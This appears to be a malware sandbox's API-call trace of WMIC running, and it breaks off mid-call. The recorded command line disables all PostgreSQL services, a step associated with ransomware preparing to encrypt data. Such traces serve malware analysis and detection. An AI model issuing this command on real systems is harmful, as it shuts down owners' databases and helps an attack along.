[0118.551] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.551] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.551] lstrlenW (lpString="LHNIWSJ") returned 7 [0118.551] ResolveDelayLoadedAPI () returned 0x77bb9840 [0118.553] SysStringLen (param_1="IDENTIFY") returned 0x8 [0118.553] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0118.553] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0118.553] SysStringLen (param_1="IDENTIFY") returned 0x8 [0118.553] SysStringLen (param_1="IMPERSONATE") returned 0xb [0118.553] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0118.553] SysStringLen (param_1="IMPERSONATE") returned 0xb [0118.553] SysStringLen (param_1="IDENTIFY") returned 0x8 [0118.553] SysStringLen (param_1="IDENTIFY") returned 0x8 [0118.553] SysStringLen (param_1="IMPERSONATE") returned 0xb [0118.553] SysStringLen (param_1="DELEGATE") returned 0x8 [0118.553] SysStringLen (param_1="IDENTIFY") returned 0x8 [0118.553] SysStringLen (param_1="DELEGATE") returned 0x8 [0118.553] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0118.553] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0118.553] SysStringLen (param_1="DELEGATE") returned 0x8 [0118.553] SysStringLen (param_1="NONE") returned 0x4 [0118.553] SysStringLen (param_1="DEFAULT") returned 0x7 [0118.553] SysStringLen (param_1="DEFAULT") returned 0x7 [0118.553] SysStringLen (param_1="NONE") returned 0x4 [0118.554] SysStringLen (param_1="CONNECT") returned 0x7 [0118.554] SysStringLen (param_1="DEFAULT") returned 0x7 [0118.554] SysStringLen (param_1="CALL") returned 0x4 [0118.554] SysStringLen (param_1="DEFAULT") returned 0x7 [0118.554] SysStringLen (param_1="CALL") returned 0x4 [0118.554] SysStringLen (param_1="CONNECT") returned 0x7 [0118.554] SysStringLen (param_1="PKT") returned 0x3 [0118.554] SysStringLen (param_1="DEFAULT") returned 0x7 [0118.554] SysStringLen (param_1="PKT") returned 0x3 [0118.554] SysStringLen (param_1="NONE") returned 0x4 [0118.554] SysStringLen (param_1="NONE") returned 0x4 [0118.554] SysStringLen (param_1="PKT") returned 0x3 [0118.554] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0118.554] SysStringLen (param_1="DEFAULT") returned 0x7 [0118.554] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0118.554] SysStringLen (param_1="NONE") returned 0x4 [0118.554] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0118.554] SysStringLen (param_1="PKT") returned 0x3 [0118.554] SysStringLen (param_1="PKT") returned 0x3 [0118.554] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0118.554] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0118.554] SysStringLen (param_1="DEFAULT") returned 0x7 [0118.554] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0118.554] SysStringLen (param_1="PKT") returned 0x3 [0118.554] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0118.554] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0118.555] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0118.555] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0118.555] GetSystemDirectoryW (in: lpBuffer=0x6529d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0118.555] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0118.555] SysStringLen (param_1="\\wbem\\") returned 0x6 [0118.555] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0118.555] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0118.555] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0118.555] GetCurrentThreadId () returned 0xfdc [0118.555] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x20f25c | out: phkResult=0x20f25c*=0x164) returned 0x0 [0118.555] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x20f268, lpcbData=0x20f264*=0x400 | out: lpType=0x0, lpData=0x20f268*=0x30, lpcbData=0x20f264*=0x4) returned 0x0 [0118.555] _wcsicmp (_String1="0", _String2="1") returned -1 [0118.555] _wcsicmp (_String1="0", _String2="2") returned -2 [0118.555] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x20f264*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x20f264*=0x42) returned 0x0 [0118.555] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x652be0, lpcbData=0x20f264*=0x42 | out: lpType=0x0, lpData=0x652be0*=0x25, lpcbData=0x20f264*=0x42) returned 0x0 [0118.555] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0118.556] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0118.556] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x20f268, lpcbData=0x20f264*=0x400 | out: lpType=0x0, lpData=0x20f268*=0x36, lpcbData=0x20f264*=0xc) returned 0x0 [0118.556] _wtol (_String="65536") returned 65536 [0118.556] RegCloseKey (hKey=0x0) returned 0x6 [0118.556] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x20f6fc | out: ppv=0x20f6fc*=0xb545a8) returned 0x0 [0118.564] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0xb545a8, xmlSource=0x20f67c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x20f6e0 | out: isSuccessful=0x20f6e0*=0xffff) returned 0x0 [0118.612] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0xb545a8, DOMElement=0x20f6f4 | out: DOMElement=0x20f6f4) returned 0x0 [0118.613] SysStringLen (param_1="VALUE") returned 0x5 [0118.613] SysStringLen (param_1="TABLE") returned 0x5 [0118.613] SysStringLen (param_1="TABLE") returned 0x5 [0118.613] SysStringLen (param_1="VALUE") returned 0x5 [0118.613] SysStringLen (param_1="LIST") returned 0x4 [0118.613] SysStringLen (param_1="TABLE") returned 0x5 [0118.613] SysStringLen (param_1="RAWXML") returned 0x6 [0118.614] SysStringLen (param_1="TABLE") returned 0x5 [0118.614] SysStringLen (param_1="RAWXML") returned 0x6 [0118.614] SysStringLen (param_1="LIST") returned 0x4 [0118.614] SysStringLen (param_1="LIST") returned 0x4 [0118.614] SysStringLen (param_1="RAWXML") returned 0x6 [0118.614] SysStringLen (param_1="HTABLE") returned 0x6 [0118.614] SysStringLen (param_1="TABLE") returned 0x5 [0118.614] SysStringLen (param_1="HTABLE") returned 0x6 [0118.614] SysStringLen (param_1="LIST") returned 0x4 [0118.614] SysStringLen (param_1="HFORM") returned 0x5 [0118.614] SysStringLen (param_1="TABLE") returned 0x5 [0118.614] SysStringLen (param_1="HFORM") returned 0x5 [0118.614] SysStringLen (param_1="LIST") returned 0x4 [0118.614] SysStringLen (param_1="HFORM") returned 0x5 [0118.614] SysStringLen (param_1="HTABLE") returned 0x6 [0118.615] SysStringLen (param_1="XML") returned 0x3 [0118.615] SysStringLen (param_1="TABLE") returned 0x5 [0118.615] SysStringLen (param_1="XML") returned 0x3 [0118.615] SysStringLen (param_1="VALUE") returned 0x5 [0118.615] SysStringLen (param_1="VALUE") returned 0x5 [0118.615] SysStringLen (param_1="XML") returned 0x3 [0118.615] SysStringLen (param_1="MOF") returned 0x3 [0118.615] SysStringLen (param_1="TABLE") returned 0x5 [0118.615] SysStringLen (param_1="MOF") returned 0x3 [0118.615] SysStringLen (param_1="LIST") returned 0x4 [0118.615] SysStringLen (param_1="MOF") returned 0x3 [0118.615] SysStringLen (param_1="RAWXML") returned 0x6 [0118.615] SysStringLen (param_1="LIST") returned 0x4 [0118.615] SysStringLen (param_1="MOF") returned 0x3 [0118.616] SysStringLen (param_1="CSV") returned 0x3 [0118.616] SysStringLen (param_1="TABLE") returned 0x5 [0118.616] SysStringLen (param_1="CSV") returned 0x3 [0118.616] SysStringLen (param_1="LIST") returned 0x4 [0118.616] SysStringLen (param_1="CSV") returned 0x3 [0118.616] SysStringLen (param_1="HTABLE") returned 0x6 [0118.616] SysStringLen (param_1="CSV") returned 0x3 [0118.616] SysStringLen (param_1="HFORM") returned 0x5 [0118.616] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.616] SysStringLen (param_1="TABLE") returned 0x5 [0118.616] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.616] SysStringLen (param_1="VALUE") returned 0x5 [0118.616] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.616] SysStringLen (param_1="XML") returned 0x3 [0118.616] SysStringLen (param_1="XML") returned 0x3 [0118.616] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.617] SysStringLen (param_1="texttablewsys") returned 0xd [0118.617] SysStringLen (param_1="TABLE") returned 0x5 [0118.617] SysStringLen (param_1="texttablewsys") returned 0xd [0118.617] SysStringLen (param_1="XML") returned 0x3 [0118.617] SysStringLen (param_1="texttablewsys") returned 0xd [0118.617] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.617] SysStringLen (param_1="XML") returned 0x3 [0118.617] SysStringLen (param_1="texttablewsys") returned 0xd [0118.617] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.617] SysStringLen (param_1="TABLE") returned 0x5 [0118.617] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.617] SysStringLen (param_1="XML") returned 0x3 [0118.617] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.617] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.617] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.617] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.618] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0118.618] SysStringLen (param_1="TABLE") returned 0x5 [0118.618] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0118.618] SysStringLen (param_1="XML") returned 0x3 [0118.618] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0118.618] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.618] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0118.618] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.618] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.618] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0118.618] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0118.618] SysStringLen (param_1="TABLE") returned 0x5 [0118.618] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0118.618] SysStringLen (param_1="XML") returned 0x3 [0118.618] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0118.618] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.618] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0118.618] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.618] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.619] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0118.619] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0118.619] SysStringLen (param_1="TABLE") returned 0x5 [0118.619] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0118.619] SysStringLen (param_1="XML") returned 0x3 [0118.619] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0118.619] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.619] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0118.619] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.619] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0118.619] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0118.619] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.619] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0118.619] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0118.619] SysStringLen (param_1="TABLE") returned 0x5 [0118.619] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0118.619] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.619] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0118.619] SysStringLen (param_1="XML") returned 0x3 [0118.620] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0118.620] SysStringLen (param_1="texttablewsys") returned 0xd [0118.620] SysStringLen (param_1="XML") returned 0x3 [0118.620] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0118.620] SysStringLen (param_1="htable-sortby") returned 0xd [0118.620] SysStringLen (param_1="TABLE") returned 0x5 [0118.620] SysStringLen (param_1="htable-sortby") returned 0xd [0118.620] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.620] SysStringLen (param_1="htable-sortby") returned 0xd [0118.620] SysStringLen (param_1="XML") returned 0x3 [0118.620] SysStringLen (param_1="htable-sortby") returned 0xd [0118.620] SysStringLen (param_1="texttablewsys") returned 0xd [0118.620] SysStringLen (param_1="htable-sortby") returned 0xd [0118.620] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0118.620] SysStringLen (param_1="XML") returned 0x3 [0118.620] SysStringLen (param_1="htable-sortby") returned 0xd [0118.620] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0118.620] SysStringLen (param_1="TABLE") returned 0x5 [0118.620] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0118.620] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.621] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0118.621] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.621] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0118.621] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0118.621] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.621] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0118.621] SysStringLen (param_1="wmiclimofformat") returned 0xf [0118.621] SysStringLen (param_1="TABLE") returned 0x5 [0118.621] SysStringLen (param_1="wmiclimofformat") returned 0xf [0118.621] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.621] SysStringLen (param_1="wmiclimofformat") returned 0xf [0118.621] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.621] SysStringLen (param_1="wmiclimofformat") returned 0xf [0118.621] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0118.621] SysStringLen (param_1="wmiclimofformat") returned 0xf [0118.621] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0118.621] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.621] SysStringLen (param_1="wmiclimofformat") returned 0xf [0118.621] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0118.621] SysStringLen (param_1="TABLE") returned 0x5 [0118.622] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0118.622] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.622] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0118.622] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.622] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0118.622] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0118.622] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0118.622] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0118.622] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0118.622] SysStringLen (param_1="TABLE") returned 0x5 [0118.622] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0118.622] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0118.622] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0118.622] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0118.622] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0118.622] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0118.622] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0118.622] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0118.622] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0118.622] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0118.622] FreeThreadedDOMDocument:IUnknown:Release (This=0xb545a8) returned 0x0 [0118.622] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'" [0118.623] memcpy_s (in: _Destination=0x658070, _DestinationSize=0xae, _Source=0x2a1588, _SourceSize=0xa4 | out: _Destination=0x658070) returned 0x0 [0118.623] GetLocalTime (in: lpSystemTime=0x20f6a4 | out: lpSystemTime=0x20f6a4*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0xb, wMilliseconds=0x1e5)) [0118.623] _vsnwprintf (in: _Buffer=0x658128, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x20f684 | out: _Buffer="04-15-2018T10:09:11") returned 19 [0118.623] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'") returned 78 [0118.623] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'") returned 78 [0118.623] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'") returned 78 [0118.623] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'") returned 78 [0118.623] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'") returned 78 [0118.623] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'") returned 78 [0118.623] lstrlenW (lpString="SERVICE") returned 7 [0118.623] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0118.623] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'") returned 78 [0118.623] lstrlenW (lpString="WHERE") returned 5 [0118.623] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0118.623] memmove_s (in: _Destination=0x652c78, _DestinationSize=0x4, _Source=0x652c68, _SourceSize=0x4 | out: _Destination=0x652c78) returned 0x0 [0118.623] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'") returned 78 [0118.623] lstrlenW (lpString="'caption LIKE '%postgresql%''") returned 29 [0118.623] _wcsicmp (_String1="'caption LIKE '%postgresql%''", _String2="\"NULL\"") returned 5 [0118.623] lstrlenW (lpString="'caption LIKE '%postgresql%''") returned 29 [0118.623] lstrlenW (lpString="'caption LIKE '%postgresql%''") returned 29 [0118.623] memmove_s (in: _Destination=0x657ed8, _DestinationSize=0x8, _Source=0x652c78, _SourceSize=0x8 | out: _Destination=0x657ed8) returned 0x0 [0118.623] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'") returned 78 [0118.623] lstrlenW (lpString="CALL") returned 4 [0118.623] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0118.623] memmove_s (in: _Destination=0x657ff8, _DestinationSize=0xc, _Source=0x657ed8, _SourceSize=0xc | out: _Destination=0x657ff8) returned 0x0 [0118.624] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'") returned 78 [0118.624] lstrlenW (lpString="ChangeStartMode") returned 15 [0118.624] _wcsicmp (_String1="ChangeStartMode", _String2="\"NULL\"") returned 65 [0118.624] memmove_s (in: _Destination=0x6522b8, _DestinationSize=0x10, _Source=0x657ff8, _SourceSize=0x10 | out: _Destination=0x6522b8) returned 0x0 [0118.624] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%postgresql%'' CALL ChangeStartMode 'Disabled'") returned 78 [0118.624] lstrlenW (lpString="'Disabled'") returned 10 [0118.624] _wcsicmp (_String1="'Disabled'", _String2="\"NULL\"") returned 5 [0118.624] lstrlenW (lpString="'Disabled'") returned 10 [0118.624] lstrlenW (lpString="'Disabled'") returned 10 [0118.624] lstrlenW (lpString="QUIT") returned 4 [0118.624] lstrlenW (lpString="SERVICE") returned 7 [0118.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0118.624] lstrlenW (lpString="EXIT") returned 4 [0118.624] lstrlenW (lpString="SERVICE") returned 7 [0118.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0118.624] WbemLocator:IUnknown:AddRef (This=0x2b1a48) returned 0x2 [0118.624] lstrlenW (lpString="/") returned 1 [0118.624] lstrlenW (lpString="SERVICE") returned 7 [0118.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0118.624] lstrlenW (lpString="-") returned 1 [0118.624] lstrlenW (lpString="SERVICE") returned 7 [0118.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0118.624] lstrlenW (lpString="CLASS") returned 5 [0118.624] lstrlenW (lpString="SERVICE") returned 7 [0118.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0118.624] lstrlenW (lpString="PATH") returned 4 [0118.624] lstrlenW (lpString="SERVICE") returned 7 [0118.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0118.624] lstrlenW (lpString="CONTEXT") returned 7 [0118.624] lstrlenW (lpString="SERVICE") returned 7 [0118.624] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0118.624] lstrlenW (lpString="SERVICE") returned 7 [0118.624] lstrlenW (lpString="SERVICE") returned 7 [0118.624] GetCurrentThreadId () returned 0xfdc [0118.624] ??0CHString@@QAE@XZ () returned 0x20f5f8 [0118.624] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2b1a48, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0x2d0ab8) returned 0x0 [0118.648] CoSetProxyBlanket (pProxy=0x2d0ab8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0118.648] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.648] GetCurrentThreadId () returned 0xfdc [0118.648] ??0CHString@@QAE@XZ () returned 0x20f5a0 [0118.648] SysStringLen (param_1="root\\cli") returned 0x8 [0118.648] SysStringLen (param_1="\\") returned 0x1 [0118.648] SysStringLen (param_1="root\\cli\\") returned 0x9 [0118.648] SysStringLen (param_1="ms_409") returned 0x6 [0118.648] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2b1a48, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0x2d0ec8) returned 0x0 [0118.655] ??1CHString@@QAE@XZ () returned 0x74a66430 [0118.655] GetCurrentThreadId () returned 0xfdc [0118.655] ??0CHString@@QAE@XZ () returned 0x20f5fc [0118.655] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0118.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x658300, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0118.655] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0118.655] SysStringLen (param_1="SERVICE") returned 0x7 [0118.655] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0118.655] SysStringLen (param_1="'") returned 0x1 [0118.656] IWbemServices:GetObject (in: This=0x2d0ab8, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x20f5f8*=0x0, ppCallResult=0x0 | out: ppObject=0x20f5f8*=0x2f5dd0, ppCallResult=0x0) returned 0x0 [0118.662] IWbemClassObject:Get (in: This=0x2f5dd0, wszName="Target", lFlags=0, pVal=0x20f5d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f5d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.662] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0118.662] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0118.662] IWbemClassObject:Get (in: This=0x2f5dd0, wszName="PWhere", lFlags=0, pVal=0x20f5d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f5d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.662] lstrlenW (lpString="WHERE Name='#'") returned 14 [0118.662] lstrlenW (lpString="WHERE Name='#'") returned 14 [0118.662] IWbemClassObject:Get (in: This=0x2f5dd0, wszName="Connection", lFlags=0, pVal=0x20f5d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f5d0*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2f6190, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.662] IUnknown:QueryInterface (in: This=0x2f6190, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x20f5ec | out: ppvObject=0x20f5ec*=0x2f6190) returned 0x0 [0118.662] GetCurrentThreadId () returned 0xfdc [0118.662] ??0CHString@@QAE@XZ () returned 0x20f56c [0118.662] IWbemClassObject:Get (in: This=0x2f6190, wszName="Namespace", lFlags=0, pVal=0x20f550*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f550*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.662] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0118.663] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0118.663] IWbemClassObject:Get (in: This=0x2f6190, wszName="Locale", lFlags=0, pVal=0x20f550*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2d6ac4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f550*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.663] lstrlenW (lpString="ms_409") returned 6 [0118.663] lstrlenW (lpString="ms_409") returned 6 [0118.663] IWbemClassObject:Get (in: This=0x2f6190, wszName="User", lFlags=0, pVal=0x20f550*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2d6ac4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x20f550*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0118.663] IWbemClassObject:Get (in: This=0x2f6190, wszName="Password", lFlags=0, 